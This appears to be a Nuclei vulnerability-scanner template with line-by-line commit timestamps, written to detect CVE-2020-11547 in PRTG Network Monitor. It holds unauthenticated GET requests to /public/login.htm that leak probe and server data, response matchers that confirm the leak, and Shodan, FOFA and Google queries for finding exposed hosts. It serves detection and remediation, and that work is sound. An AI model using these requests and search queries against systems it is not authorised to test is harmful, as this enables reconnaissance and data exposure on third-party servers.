2021-09-02 11:43:37 +00:00
id : CVE-2020-11547
info :
2023-04-04 19:00:14 +00:00
name : PRTG Network Monitor <20.1.57.1745 - Information Disclosure
2021-09-02 11:43:37 +00:00
author : x6263
severity : medium
2023-04-04 19:00:14 +00:00
description : PRTG Network Monitor before 20.1.57.1745 is susceptible to information disclosure. An attacker can obtain information about probes running or the server itself via an HTTP request, thus potentially being able to modify data and/or execute unauthorized administrative operations in the context of the affected site.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can exploit this vulnerability to gain sensitive information from the PRTG Network Monitor.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade PRTG Network Monitor to version 20.1.57.1745 or higher to mitigate the information disclosure vulnerability.
2021-09-02 12:55:16 +00:00
reference :
2021-09-02 11:43:37 +00:00
- https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
2022-05-17 09:18:12 +00:00
- https://github.com/ch-rigu/PRTG-Network-Monitor-Information-Disclosure
2023-04-04 19:00:14 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-11547
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-11547
2023-07-15 16:29:17 +00:00
cwe-id : CWE-306
2023-04-12 10:55:48 +00:00
epss-score : 0.0011
2024-05-31 19:23:20 +00:00
epss-percentile : 0.44069
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:*
2023-04-12 10:55:48 +00:00
metadata :
2023-05-02 12:51:24 +00:00
verified : true
2023-09-06 12:22:36 +00:00
max-request : 3
2023-07-15 16:29:17 +00:00
vendor : paessler
2024-05-23 21:45:20 +00:00
product : prtg_network_monitor
2024-06-07 10:04:29 +00:00
shodan-query :
- title:"prtg"
- http.title:"prtg"
2024-05-31 19:23:20 +00:00
fofa-query : title="prtg"
google-query : intitle:"prtg"
2024-01-14 09:21:50 +00:00
tags : cve2020,cve,prtg,disclosure,paessler
2021-09-02 11:43:37 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-02 11:43:37 +00:00
- method : GET
path :
2021-09-02 12:55:16 +00:00
- "{{BaseURL}}/public/login.htm?type=probes"
- "{{BaseURL}}/public/login.htm?type=requests"
2022-12-22 18:20:45 +00:00
- "{{BaseURL}}/public/login.htm?type=treestat"
2021-09-02 12:55:16 +00:00
2022-12-23 09:42:30 +00:00
stop-at-first-match : true
2023-07-15 16:29:17 +00:00
2021-09-02 12:55:16 +00:00
matchers-condition : and
2021-09-02 11:43:37 +00:00
matchers :
2021-09-02 12:55:16 +00:00
- type : dsl
dsl :
2022-06-30 11:19:17 +00:00
- "contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"
2021-09-02 12:55:16 +00:00
2021-09-02 11:43:37 +00:00
- type : word
2022-06-30 11:19:17 +00:00
part : body
2021-09-02 11:43:37 +00:00
words :
2021-09-02 12:55:16 +00:00
- "prtg_network_monitor"
2022-12-22 18:20:45 +00:00
- "Probes"
- "Groups"
2022-12-22 18:22:47 +00:00
condition : or
2021-09-02 12:55:16 +00:00
2021-09-02 11:43:37 +00:00
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 490a0046304402206ec1b613324d89f19d4ca4692a2b523f25d073de7a1ef1d288d76e04a148eefd022051fc99e5431ee45f62aed66e653c6254d824e25cbdfacd09f5d00ec5e77f7675:922c64590222798bb761d5b6d8e72950